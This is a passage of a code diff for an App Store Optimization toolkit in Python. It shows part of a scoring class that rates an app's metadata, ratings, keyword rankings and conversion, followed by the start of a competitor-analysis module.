'weight': self.WEIGHTS['ratings_reviews'],
|
||||||
|
'weighted_contribution': round(ratings_score * (self.WEIGHTS['ratings_reviews'] / 100), 1)
|
||||||
|
},
|
||||||
|
'keyword_performance': {
|
||||||
|
'score': keyword_score,
|
||||||
|
'weight': self.WEIGHTS['keyword_performance'],
|
||||||
|
'weighted_contribution': round(keyword_score * (self.WEIGHTS['keyword_performance'] / 100), 1)
|
||||||
|
},
|
||||||
|
'conversion_metrics': {
|
||||||
|
'score': conversion_score,
|
||||||
|
'weight': self.WEIGHTS['conversion_metrics'],
|
||||||
|
'weighted_contribution': round(conversion_score * (self.WEIGHTS['conversion_metrics'] / 100), 1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Generate recommendations
|
||||||
|
recommendations = self.generate_recommendations(
|
||||||
|
metadata_score,
|
||||||
|
ratings_score,
|
||||||
|
keyword_score,
|
||||||
|
conversion_score
|
||||||
|
)
|
||||||
|
|
||||||
|
# Assess overall health
|
||||||
|
health_status = self._assess_health_status(overall_score)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'overall_score': round(overall_score, 1),
|
||||||
|
'health_status': health_status,
|
||||||
|
'score_breakdown': self.score_breakdown,
|
||||||
|
'recommendations': recommendations,
|
||||||
|
'priority_actions': self._prioritize_actions(recommendations),
|
||||||
|
'strengths': self._identify_strengths(self.score_breakdown),
|
||||||
|
'weaknesses': self._identify_weaknesses(self.score_breakdown)
|
||||||
|
}
|
||||||
|
|
||||||
|
def score_metadata_quality(self, metadata: Dict[str, Any]) -> float:
|
||||||
|
"""
|
||||||
|
Score metadata quality (0-100).
|
||||||
|
|
||||||
|
Evaluates:
|
||||||
|
- Title optimization
|
||||||
|
- Description quality
|
||||||
|
- Keyword usage
|
||||||
|
"""
|
||||||
|
scores = []
|
||||||
|
|
||||||
|
# Title score (0-35 points)
|
||||||
|
title_keywords = metadata.get('title_keyword_count', 0)
|
||||||
|
title_length = metadata.get('title_length', 0)
|
||||||
|
|
||||||
|
title_score = 0
|
||||||
|
if title_keywords >= self.BENCHMARKS['title_keyword_usage']['target']:
|
||||||
|
title_score = 35
|
||||||
|
elif title_keywords >= self.BENCHMARKS['title_keyword_usage']['min']:
|
||||||
|
title_score = 25
|
||||||
|
else:
|
||||||
|
title_score = 10
|
||||||
|
|
||||||
|
# Adjust for title length usage
|
||||||
|
if title_length > 25: # Using most of available space
|
||||||
|
title_score += 0
|
||||||
|
else:
|
||||||
|
title_score -= 5
|
||||||
|
|
||||||
|
scores.append(min(title_score, 35))
|
||||||
|
|
||||||
|
# Description score (0-35 points)
|
||||||
|
desc_length = metadata.get('description_length', 0)
|
||||||
|
desc_quality = metadata.get('description_quality', 0.0) # 0-1 scale
|
||||||
|
|
||||||
|
desc_score = 0
|
||||||
|
if desc_length >= self.BENCHMARKS['description_length']['target']:
|
||||||
|
desc_score = 25
|
||||||
|
elif desc_length >= self.BENCHMARKS['description_length']['min']:
|
||||||
|
desc_score = 15
|
||||||
|
else:
|
||||||
|
desc_score = 5
|
||||||
|
|
||||||
|
# Add quality bonus
|
||||||
|
desc_score += desc_quality * 10
|
||||||
|
scores.append(min(desc_score, 35))
|
||||||
|
|
||||||
|
# Keyword density score (0-30 points)
|
||||||
|
keyword_density = metadata.get('keyword_density', 0.0)
|
||||||
|
|
||||||
|
if self.BENCHMARKS['keyword_density']['min'] <= keyword_density <= self.BENCHMARKS['keyword_density']['optimal']:
|
||||||
|
density_score = 30
|
||||||
|
elif keyword_density < self.BENCHMARKS['keyword_density']['min']:
|
||||||
|
# Too low - proportional scoring
|
||||||
|
density_score = (keyword_density / self.BENCHMARKS['keyword_density']['min']) * 20
|
||||||
|
else:
|
||||||
|
# Too high (keyword stuffing) - penalty
|
||||||
|
excess = keyword_density - self.BENCHMARKS['keyword_density']['optimal']
|
||||||
|
density_score = max(30 - (excess * 5), 0)
|
||||||
|
|
||||||
|
scores.append(density_score)
|
||||||
|
|
||||||
|
return round(sum(scores), 1)
|
||||||
|
|
||||||
|
def score_ratings_reviews(self, ratings: Dict[str, Any]) -> float:
|
||||||
|
"""
|
||||||
|
Score ratings and reviews (0-100).
|
||||||
|
|
||||||
|
Evaluates:
|
||||||
|
- Average rating
|
||||||
|
- Total ratings count
|
||||||
|
- Review velocity
|
||||||
|
"""
|
||||||
|
average_rating = ratings.get('average_rating', 0.0)
|
||||||
|
total_ratings = ratings.get('total_ratings', 0)
|
||||||
|
recent_ratings = ratings.get('recent_ratings_30d', 0)
|
||||||
|
|
||||||
|
# Rating quality score (0-50 points)
|
||||||
|
if average_rating >= self.BENCHMARKS['average_rating']['target']:
|
||||||
|
rating_quality_score = 50
|
||||||
|
elif average_rating >= self.BENCHMARKS['average_rating']['min']:
|
||||||
|
# Proportional scoring between min and target
|
||||||
|
proportion = (average_rating - self.BENCHMARKS['average_rating']['min']) / \
|
||||||
|
(self.BENCHMARKS['average_rating']['target'] - self.BENCHMARKS['average_rating']['min'])
|
||||||
|
rating_quality_score = 30 + (proportion * 20)
|
||||||
|
elif average_rating >= 3.0:
|
||||||
|
rating_quality_score = 20
|
||||||
|
else:
|
||||||
|
rating_quality_score = 10
|
||||||
|
|
||||||
|
# Rating volume score (0-30 points)
|
||||||
|
if total_ratings >= self.BENCHMARKS['ratings_count']['target']:
|
||||||
|
rating_volume_score = 30
|
||||||
|
elif total_ratings >= self.BENCHMARKS['ratings_count']['min']:
|
||||||
|
# Proportional scoring
|
||||||
|
proportion = (total_ratings - self.BENCHMARKS['ratings_count']['min']) / \
|
||||||
|
(self.BENCHMARKS['ratings_count']['target'] - self.BENCHMARKS['ratings_count']['min'])
|
||||||
|
rating_volume_score = 15 + (proportion * 15)
|
||||||
|
else:
|
||||||
|
# Very low volume
|
||||||
|
rating_volume_score = (total_ratings / self.BENCHMARKS['ratings_count']['min']) * 15
|
||||||
|
|
||||||
|
# Rating velocity score (0-20 points)
|
||||||
|
if recent_ratings > 100:
|
||||||
|
velocity_score = 20
|
||||||
|
elif recent_ratings > 50:
|
||||||
|
velocity_score = 15
|
||||||
|
elif recent_ratings > 10:
|
||||||
|
velocity_score = 10
|
||||||
|
else:
|
||||||
|
velocity_score = 5
|
||||||
|
|
||||||
|
total_score = rating_quality_score + rating_volume_score + velocity_score
|
||||||
|
|
||||||
|
return round(min(total_score, 100), 1)
|
||||||
|
|
||||||
|
def score_keyword_performance(self, keyword_performance: Dict[str, Any]) -> float:
|
||||||
|
"""
|
||||||
|
Score keyword ranking performance (0-100).
|
||||||
|
|
||||||
|
Evaluates:
|
||||||
|
- Top 10 rankings
|
||||||
|
- Top 50 rankings
|
||||||
|
- Ranking trends
|
||||||
|
"""
|
||||||
|
top_10_count = keyword_performance.get('top_10', 0)
|
||||||
|
top_50_count = keyword_performance.get('top_50', 0)
|
||||||
|
top_100_count = keyword_performance.get('top_100', 0)
|
||||||
|
improving_keywords = keyword_performance.get('improving_keywords', 0)
|
||||||
|
|
||||||
|
# Top 10 score (0-50 points) - most valuable rankings
|
||||||
|
if top_10_count >= self.BENCHMARKS['keywords_top_10']['target']:
|
||||||
|
top_10_score = 50
|
||||||
|
elif top_10_count >= self.BENCHMARKS['keywords_top_10']['min']:
|
||||||
|
proportion = (top_10_count - self.BENCHMARKS['keywords_top_10']['min']) / \
|
||||||
|
(self.BENCHMARKS['keywords_top_10']['target'] - self.BENCHMARKS['keywords_top_10']['min'])
|
||||||
|
top_10_score = 25 + (proportion * 25)
|
||||||
|
else:
|
||||||
|
top_10_score = (top_10_count / self.BENCHMARKS['keywords_top_10']['min']) * 25
|
||||||
|
|
||||||
|
# Top 50 score (0-30 points)
|
||||||
|
if top_50_count >= self.BENCHMARKS['keywords_top_50']['target']:
|
||||||
|
top_50_score = 30
|
||||||
|
elif top_50_count >= self.BENCHMARKS['keywords_top_50']['min']:
|
||||||
|
proportion = (top_50_count - self.BENCHMARKS['keywords_top_50']['min']) / \
|
||||||
|
(self.BENCHMARKS['keywords_top_50']['target'] - self.BENCHMARKS['keywords_top_50']['min'])
|
||||||
|
top_50_score = 15 + (proportion * 15)
|
||||||
|
else:
|
||||||
|
top_50_score = (top_50_count / self.BENCHMARKS['keywords_top_50']['min']) * 15
|
||||||
|
|
||||||
|
# Coverage score (0-10 points) - based on top 100
|
||||||
|
coverage_score = min((top_100_count / 30) * 10, 10)
|
||||||
|
|
||||||
|
# Trend score (0-10 points) - are rankings improving?
|
||||||
|
if improving_keywords > 5:
|
||||||
|
trend_score = 10
|
||||||
|
elif improving_keywords > 0:
|
||||||
|
trend_score = 5
|
||||||
|
else:
|
||||||
|
trend_score = 0
|
||||||
|
|
||||||
|
total_score = top_10_score + top_50_score + coverage_score + trend_score
|
||||||
|
|
||||||
|
return round(min(total_score, 100), 1)
|
||||||
|
|
||||||
|
def score_conversion_metrics(self, conversion: Dict[str, Any]) -> float:
|
||||||
|
"""
|
||||||
|
Score conversion performance (0-100).
|
||||||
|
|
||||||
|
Evaluates:
|
||||||
|
- Impression-to-install conversion rate
|
||||||
|
- Download velocity
|
||||||
|
"""
|
||||||
|
conversion_rate = conversion.get('impression_to_install', 0.0)
|
||||||
|
downloads_30d = conversion.get('downloads_last_30_days', 0)
|
||||||
|
downloads_trend = conversion.get('downloads_trend', 'stable') # 'up', 'stable', 'down'
|
||||||
|
|
||||||
|
# Conversion rate score (0-70 points)
|
||||||
|
if conversion_rate >= self.BENCHMARKS['conversion_rate']['target']:
|
||||||
|
conversion_score = 70
|
||||||
|
elif conversion_rate >= self.BENCHMARKS['conversion_rate']['min']:
|
||||||
|
proportion = (conversion_rate - self.BENCHMARKS['conversion_rate']['min']) / \
|
||||||
|
(self.BENCHMARKS['conversion_rate']['target'] - self.BENCHMARKS['conversion_rate']['min'])
|
||||||
|
conversion_score = 35 + (proportion * 35)
|
||||||
|
else:
|
||||||
|
conversion_score = (conversion_rate / self.BENCHMARKS['conversion_rate']['min']) * 35
|
||||||
|
|
||||||
|
# Download velocity score (0-20 points)
|
||||||
|
if downloads_30d > 10000:
|
||||||
|
velocity_score = 20
|
||||||
|
elif downloads_30d > 1000:
|
||||||
|
velocity_score = 15
|
||||||
|
elif downloads_30d > 100:
|
||||||
|
velocity_score = 10
|
||||||
|
else:
|
||||||
|
velocity_score = 5
|
||||||
|
|
||||||
|
# Trend bonus (0-10 points)
|
||||||
|
if downloads_trend == 'up':
|
||||||
|
trend_score = 10
|
||||||
|
elif downloads_trend == 'stable':
|
||||||
|
trend_score = 5
|
||||||
|
else:
|
||||||
|
trend_score = 0
|
||||||
|
|
||||||
|
total_score = conversion_score + velocity_score + trend_score
|
||||||
|
|
||||||
|
return round(min(total_score, 100), 1)
|
||||||
|
|
||||||
|
def generate_recommendations(
|
||||||
|
self,
|
||||||
|
metadata_score: float,
|
||||||
|
ratings_score: float,
|
||||||
|
keyword_score: float,
|
||||||
|
conversion_score: float
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Generate prioritized recommendations based on scores."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
# Metadata recommendations
|
||||||
|
if metadata_score < 60:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'metadata_quality',
|
||||||
|
'priority': 'high',
|
||||||
|
'action': 'Optimize app title and description',
|
||||||
|
'details': 'Add more keywords to title, expand description to 1500-2000 characters, improve keyword density to 3-5%',
|
||||||
|
'expected_impact': 'Improve discoverability and ranking potential'
|
||||||
|
})
|
||||||
|
elif metadata_score < 80:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'metadata_quality',
|
||||||
|
'priority': 'medium',
|
||||||
|
'action': 'Refine metadata for better keyword targeting',
|
||||||
|
'details': 'Test variations of title/subtitle, optimize keyword field for Apple',
|
||||||
|
'expected_impact': 'Incremental ranking improvements'
|
||||||
|
})
|
||||||
|
|
||||||
|
# Ratings recommendations
|
||||||
|
if ratings_score < 60:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'ratings_reviews',
|
||||||
|
'priority': 'high',
|
||||||
|
'action': 'Improve rating quality and volume',
|
||||||
|
'details': 'Address top user complaints, implement in-app rating prompts, respond to negative reviews',
|
||||||
|
'expected_impact': 'Better conversion rates and trust signals'
|
||||||
|
})
|
||||||
|
elif ratings_score < 80:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'ratings_reviews',
|
||||||
|
'priority': 'medium',
|
||||||
|
'action': 'Increase rating velocity',
|
||||||
|
'details': 'Optimize timing of rating requests, encourage satisfied users to rate',
|
||||||
|
'expected_impact': 'Sustained rating quality'
|
||||||
|
})
|
||||||
|
|
||||||
|
# Keyword performance recommendations
|
||||||
|
if keyword_score < 60:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'keyword_performance',
|
||||||
|
'priority': 'high',
|
||||||
|
'action': 'Improve keyword rankings',
|
||||||
|
'details': 'Target long-tail keywords with lower competition, update metadata with high-potential keywords, build backlinks',
|
||||||
|
'expected_impact': 'Significant improvement in organic visibility'
|
||||||
|
})
|
||||||
|
elif keyword_score < 80:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'keyword_performance',
|
||||||
|
'priority': 'medium',
|
||||||
|
'action': 'Expand keyword coverage',
|
||||||
|
'details': 'Target additional related keywords, test seasonal keywords, localize for new markets',
|
||||||
|
'expected_impact': 'Broader reach and more discovery opportunities'
|
||||||
|
})
|
||||||
|
|
||||||
|
# Conversion recommendations
|
||||||
|
if conversion_score < 60:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'conversion_metrics',
|
||||||
|
'priority': 'high',
|
||||||
|
'action': 'Optimize store listing for conversions',
|
||||||
|
'details': 'Improve screenshots and icon, strengthen value proposition in description, add video preview',
|
||||||
|
'expected_impact': 'Higher impression-to-install conversion'
|
||||||
|
})
|
||||||
|
elif conversion_score < 80:
|
||||||
|
recommendations.append({
|
||||||
|
'category': 'conversion_metrics',
|
||||||
|
'priority': 'medium',
|
||||||
|
'action': 'Test visual asset variations',
|
||||||
|
'details': 'A/B test different icon designs and screenshot sequences',
|
||||||
|
'expected_impact': 'Incremental conversion improvements'
|
||||||
|
})
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _assess_health_status(self, overall_score: float) -> str:
|
||||||
|
"""Assess overall ASO health status."""
|
||||||
|
if overall_score >= 80:
|
||||||
|
return "Excellent - Top-tier ASO performance"
|
||||||
|
elif overall_score >= 65:
|
||||||
|
return "Good - Competitive ASO with room for improvement"
|
||||||
|
elif overall_score >= 50:
|
||||||
|
return "Fair - Needs strategic improvements"
|
||||||
|
else:
|
||||||
|
return "Poor - Requires immediate ASO overhaul"
|
||||||
|
|
||||||
|
def _prioritize_actions(
|
||||||
|
self,
|
||||||
|
recommendations: List[Dict[str, Any]]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Prioritize actions by impact and urgency."""
|
||||||
|
# Sort by priority (high first) and expected impact
|
||||||
|
priority_order = {'high': 0, 'medium': 1, 'low': 2}
|
||||||
|
|
||||||
|
sorted_recommendations = sorted(
|
||||||
|
recommendations,
|
||||||
|
key=lambda x: priority_order[x['priority']]
|
||||||
|
)
|
||||||
|
|
||||||
|
return sorted_recommendations[:3] # Top 3 priority actions
|
||||||
|
|
||||||
|
def _identify_strengths(self, score_breakdown: Dict[str, Any]) -> List[str]:
|
||||||
|
"""Identify areas of strength (scores >= 75)."""
|
||||||
|
strengths = []
|
||||||
|
|
||||||
|
for category, data in score_breakdown.items():
|
||||||
|
if data['score'] >= 75:
|
||||||
|
strengths.append(
|
||||||
|
f"{category.replace('_', ' ').title()}: {data['score']}/100"
|
||||||
|
)
|
||||||
|
|
||||||
|
return strengths if strengths else ["Focus on building strengths across all areas"]
|
||||||
|
|
||||||
|
def _identify_weaknesses(self, score_breakdown: Dict[str, Any]) -> List[str]:
|
||||||
|
"""Identify areas needing improvement (scores < 60)."""
|
||||||
|
weaknesses = []
|
||||||
|
|
||||||
|
for category, data in score_breakdown.items():
|
||||||
|
if data['score'] < 60:
|
||||||
|
weaknesses.append(
|
||||||
|
f"{category.replace('_', ' ').title()}: {data['score']}/100 - needs improvement"
|
||||||
|
)
|
||||||
|
|
||||||
|
return weaknesses if weaknesses else ["All areas performing adequately"]
|
||||||
|
|
||||||
|
|
||||||
|
def calculate_aso_score(
|
||||||
|
metadata: Dict[str, Any],
|
||||||
|
ratings: Dict[str, Any],
|
||||||
|
keyword_performance: Dict[str, Any],
|
||||||
|
conversion: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to calculate ASO score.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
metadata: Metadata quality metrics
|
||||||
|
ratings: Ratings data
|
||||||
|
keyword_performance: Keyword ranking data
|
||||||
|
conversion: Conversion metrics
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete ASO score report
|
||||||
|
"""
|
||||||
|
scorer = ASOScorer()
|
||||||
|
return scorer.calculate_overall_score(
|
||||||
|
metadata,
|
||||||
|
ratings,
|
||||||
|
keyword_performance,
|
||||||
|
conversion
|
||||||
|
)
|
||||||
577
skills/app-store-optimization/competitor_analyzer.py
Normal file
577
skills/app-store-optimization/competitor_analyzer.py
Normal file
@@ -0,0 +1,577 @@
|
|||||||
|
"""
|
||||||
|
Competitor analysis module for App Store Optimization.
|
||||||
|
Analyzes top competitors' ASO strategies and identifies opportunities.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
from collections import Counter
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
class CompetitorAnalyzer:
|
||||||
|
"""Analyzes competitor apps to identify ASO opportunities."""
|
||||||
|
|
||||||
|
def __init__(self, category: str, platform: str = 'apple'):
|
||||||
|
"""
|
||||||
|
Initialize competitor analyzer.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
category: App category (e.g., "Productivity", "Games")
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
"""
|
||||||
|
self.category = category
|
||||||
|
self.platform = platform
|
||||||
|
self.competitors = []
|
||||||
|
|
||||||
|
def analyze_competitor(
|
||||||
|
self,
|
||||||
|
app_data: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Analyze a single competitor's ASO strategy.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_data: Dictionary with app_name, title, description, rating, ratings_count, keywords
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Comprehensive competitor analysis
|
||||||
|
"""
|
||||||
|
app_name = app_data.get('app_name', '')
|
||||||
|
title = app_data.get('title', '')
|
||||||
|
description = app_data.get('description', '')
|
||||||
|
rating = app_data.get('rating', 0.0)
|
||||||
|
ratings_count = app_data.get('ratings_count', 0)
|
||||||
|
keywords = app_data.get('keywords', [])
|
||||||
|
|
||||||
|
analysis = {
|
||||||
|
'app_name': app_name,
|
||||||
|
'title_analysis': self._analyze_title(title),
|
||||||
|
'description_analysis': self._analyze_description(description),
|
||||||
|
'keyword_strategy': self._extract_keyword_strategy(title, description, keywords),
|
||||||
|
'rating_metrics': {
|
||||||
|
'rating': rating,
|
||||||
|
'ratings_count': ratings_count,
|
||||||
|
'rating_quality': self._assess_rating_quality(rating, ratings_count)
|
||||||
|
},
|
||||||
|
'competitive_strength': self._calculate_competitive_strength(
|
||||||
|
rating,
|
||||||
|
ratings_count,
|
||||||
|
len(description)
|
||||||
|
),
|
||||||
|
'key_differentiators': self._identify_differentiators(description)
|
||||||
|
}
|
||||||
|
|
||||||
|
self.competitors.append(analysis)
|
||||||
|
return analysis
|
||||||
|
|
||||||
|
def compare_competitors(
|
||||||
|
self,
|
||||||
|
competitors_data: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Compare multiple competitors and identify patterns.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
competitors_data: List of competitor data dictionaries
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Comparative analysis with insights
|
||||||
|
"""
|
||||||
|
# Analyze each competitor
|
||||||
|
analyses = []
|
||||||
|
for comp_data in competitors_data:
|
||||||
|
analysis = self.analyze_competitor(comp_data)
|
||||||
|
analyses.append(analysis)
|
||||||
|
|
||||||
|
# Extract common keywords across competitors
|
||||||
|
all_keywords = []
|
||||||
|
for analysis in analyses:
|
||||||
|
all_keywords.extend(analysis['keyword_strategy']['primary_keywords'])
|
||||||
|
|
||||||
|
common_keywords = self._find_common_keywords(all_keywords)
|
||||||
|
|
||||||
|
# Identify keyword gaps (used by some but not all)
|
||||||
|
keyword_gaps = self._identify_keyword_gaps(analyses)
|
||||||
|
|
||||||
|
# Rank competitors by strength
|
||||||
|
ranked_competitors = sorted(
|
||||||
|
analyses,
|
||||||
|
key=lambda x: x['competitive_strength'],
|
||||||
|
reverse=True
|
||||||
|
)
|
||||||
|
|
||||||
|
# Analyze rating distribution
|
||||||
|
rating_analysis = self._analyze_rating_distribution(analyses)
|
||||||
|
|
||||||
|
# Identify best practices
|
||||||
|
best_practices = self._identify_best_practices(ranked_competitors)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'category': self.category,
|
||||||
|
'platform': self.platform,
|
||||||
|
'competitors_analyzed': len(analyses),
|
||||||
|
'ranked_competitors': ranked_competitors,
|
||||||
|
'common_keywords': common_keywords,
|
||||||
|
'keyword_gaps': keyword_gaps,
|
||||||
|
'rating_analysis': rating_analysis,
|
||||||
|
'best_practices': best_practices,
|
||||||
|
'opportunities': self._identify_opportunities(
|
||||||
|
analyses,
|
||||||
|
common_keywords,
|
||||||
|
keyword_gaps
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def identify_gaps(
|
||||||
|
self,
|
||||||
|
your_app_data: Dict[str, Any],
|
||||||
|
competitors_data: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Identify gaps between your app and competitors.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
your_app_data: Your app's data
|
||||||
|
competitors_data: List of competitor data
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Gap analysis with actionable recommendations
|
||||||
|
"""
|
||||||
|
# Analyze your app
|
||||||
|
your_analysis = self.analyze_competitor(your_app_data)
|
||||||
|
|
||||||
|
# Analyze competitors
|
||||||
|
competitor_comparison = self.compare_competitors(competitors_data)
|
||||||
|
|
||||||
|
# Identify keyword gaps
|
||||||
|
your_keywords = set(your_analysis['keyword_strategy']['primary_keywords'])
|
||||||
|
competitor_keywords = set(competitor_comparison['common_keywords'])
|
||||||
|
missing_keywords = competitor_keywords - your_keywords
|
||||||
|
|
||||||
|
# Identify rating gap
|
||||||
|
avg_competitor_rating = competitor_comparison['rating_analysis']['average_rating']
|
||||||
|
rating_gap = avg_competitor_rating - your_analysis['rating_metrics']['rating']
|
||||||
|
|
||||||
|
# Identify description length gap
|
||||||
|
avg_competitor_desc_length = sum(
|
||||||
|
len(comp['description_analysis']['text'])
|
||||||
|
for comp in competitor_comparison['ranked_competitors']
|
||||||
|
) / len(competitor_comparison['ranked_competitors'])
|
||||||
|
your_desc_length = len(your_analysis['description_analysis']['text'])
|
||||||
|
desc_length_gap = avg_competitor_desc_length - your_desc_length
|
||||||
|
|
||||||
|
return {
|
||||||
|
'your_app': your_analysis,
|
||||||
|
'keyword_gaps': {
|
||||||
|
'missing_keywords': list(missing_keywords)[:10],
|
||||||
|
'recommendations': self._generate_keyword_recommendations(missing_keywords)
|
||||||
|
},
|
||||||
|
'rating_gap': {
|
||||||
|
'your_rating': your_analysis['rating_metrics']['rating'],
|
||||||
|
'average_competitor_rating': avg_competitor_rating,
|
||||||
|
'gap': round(rating_gap, 2),
|
||||||
|
'action_items': self._generate_rating_improvement_actions(rating_gap)
|
||||||
|
},
|
||||||
|
'content_gap': {
|
||||||
|
'your_description_length': your_desc_length,
|
||||||
|
'average_competitor_length': int(avg_competitor_desc_length),
|
||||||
|
'gap': int(desc_length_gap),
|
||||||
|
'recommendations': self._generate_content_recommendations(desc_length_gap)
|
||||||
|
},
|
||||||
|
'competitive_positioning': self._assess_competitive_position(
|
||||||
|
your_analysis,
|
||||||
|
competitor_comparison
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _analyze_title(self, title: str) -> Dict[str, Any]:
|
||||||
|
"""Analyze title structure and keyword usage."""
|
||||||
|
parts = re.split(r'[-:|]', title)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'title': title,
|
||||||
|
'length': len(title),
|
||||||
|
'has_brand': len(parts) > 0,
|
||||||
|
'has_keywords': len(parts) > 1,
|
||||||
|
'components': [part.strip() for part in parts],
|
||||||
|
'word_count': len(title.split()),
|
||||||
|
'strategy': 'brand_plus_keywords' if len(parts) > 1 else 'brand_only'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _analyze_description(self, description: str) -> Dict[str, Any]:
|
||||||
|
"""Analyze description structure and content."""
|
||||||
|
lines = description.split('\n')
|
||||||
|
word_count = len(description.split())
|
||||||
|
|
||||||
|
# Check for structural elements
|
||||||
|
has_bullet_points = '•' in description or '*' in description
|
||||||
|
has_sections = any(line.isupper() for line in lines if len(line) > 0)
|
||||||
|
has_call_to_action = any(
|
||||||
|
cta in description.lower()
|
||||||
|
for cta in ['download', 'try', 'get', 'start', 'join']
|
||||||
|
)
|
||||||
|
|
||||||
|
# Extract features mentioned
|
||||||
|
features = self._extract_features(description)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'text': description,
|
||||||
|
'length': len(description),
|
||||||
|
'word_count': word_count,
|
||||||
|
'structure': {
|
||||||
|
'has_bullet_points': has_bullet_points,
|
||||||
|
'has_sections': has_sections,
|
||||||
|
'has_call_to_action': has_call_to_action
|
||||||
|
},
|
||||||
|
'features_mentioned': features,
|
||||||
|
'readability': 'good' if 50 <= word_count <= 300 else 'needs_improvement'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _extract_keyword_strategy(
|
||||||
|
self,
|
||||||
|
title: str,
|
||||||
|
description: str,
|
||||||
|
explicit_keywords: List[str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""Extract keyword strategy from metadata."""
|
||||||
|
# Extract keywords from title
|
||||||
|
title_keywords = [word.lower() for word in title.split() if len(word) > 3]
|
||||||
|
|
||||||
|
# Extract frequently used words from description
|
||||||
|
desc_words = re.findall(r'\b\w{4,}\b', description.lower())
|
||||||
|
word_freq = Counter(desc_words)
|
||||||
|
frequent_words = [word for word, count in word_freq.most_common(15) if count > 2]
|
||||||
|
|
||||||
|
# Combine with explicit keywords
|
||||||
|
all_keywords = list(set(title_keywords + frequent_words + explicit_keywords))
|
||||||
|
|
||||||
|
return {
|
||||||
|
'primary_keywords': title_keywords,
|
||||||
|
'description_keywords': frequent_words[:10],
|
||||||
|
'explicit_keywords': explicit_keywords,
|
||||||
|
'total_unique_keywords': len(all_keywords),
|
||||||
|
'keyword_focus': self._assess_keyword_focus(title_keywords, frequent_words)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _assess_rating_quality(self, rating: float, ratings_count: int) -> str:
|
||||||
|
"""Assess the quality of ratings."""
|
||||||
|
if ratings_count < 100:
|
||||||
|
return 'insufficient_data'
|
||||||
|
elif rating >= 4.5 and ratings_count > 1000:
|
||||||
|
return 'excellent'
|
||||||
|
elif rating >= 4.0 and ratings_count > 500:
|
||||||
|
return 'good'
|
||||||
|
elif rating >= 3.5:
|
||||||
|
return 'average'
|
||||||
|
else:
|
||||||
|
return 'poor'
|
||||||
|
|
||||||
|
def _calculate_competitive_strength(
|
||||||
|
self,
|
||||||
|
rating: float,
|
||||||
|
ratings_count: int,
|
||||||
|
description_length: int
|
||||||
|
) -> float:
|
||||||
|
"""
|
||||||
|
Calculate overall competitive strength (0-100).
|
||||||
|
|
||||||
|
Factors:
|
||||||
|
- Rating quality (40%)
|
||||||
|
- Rating volume (30%)
|
||||||
|
- Metadata quality (30%)
|
||||||
|
"""
|
||||||
|
# Rating quality score (0-40)
|
||||||
|
rating_score = (rating / 5.0) * 40
|
||||||
|
|
||||||
|
# Rating volume score (0-30)
|
||||||
|
volume_score = min((ratings_count / 10000) * 30, 30)
|
||||||
|
|
||||||
|
# Metadata quality score (0-30)
|
||||||
|
metadata_score = min((description_length / 2000) * 30, 30)
|
||||||
|
|
||||||
|
total_score = rating_score + volume_score + metadata_score
|
||||||
|
|
||||||
|
return round(total_score, 1)
|
||||||
|
|
||||||
|
def _identify_differentiators(self, description: str) -> List[str]:
|
||||||
|
"""Identify key differentiators from description."""
|
||||||
|
differentiator_keywords = [
|
||||||
|
'unique', 'only', 'first', 'best', 'leading', 'exclusive',
|
||||||
|
'revolutionary', 'innovative', 'patent', 'award'
|
||||||
|
]
|
||||||
|
|
||||||
|
differentiators = []
|
||||||
|
sentences = description.split('.')
|
||||||
|
|
||||||
|
for sentence in sentences:
|
||||||
|
sentence_lower = sentence.lower()
|
||||||
|
if any(keyword in sentence_lower for keyword in differentiator_keywords):
|
||||||
|
differentiators.append(sentence.strip())
|
||||||
|
|
||||||
|
return differentiators[:5]
|
||||||
|
|
||||||
|
def _find_common_keywords(self, all_keywords: List[str]) -> List[str]:
|
||||||
|
"""Find keywords used by multiple competitors."""
|
||||||
|
keyword_counts = Counter(all_keywords)
|
||||||
|
# Return keywords used by at least 2 competitors
|
||||||
|
common = [kw for kw, count in keyword_counts.items() if count >= 2]
|
||||||
|
return sorted(common, key=lambda x: keyword_counts[x], reverse=True)[:20]
|
||||||
|
|
||||||
|
def _identify_keyword_gaps(self, analyses: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
|
||||||
|
"""Identify keywords used by some competitors but not others."""
|
||||||
|
all_keywords_by_app = {}
|
||||||
|
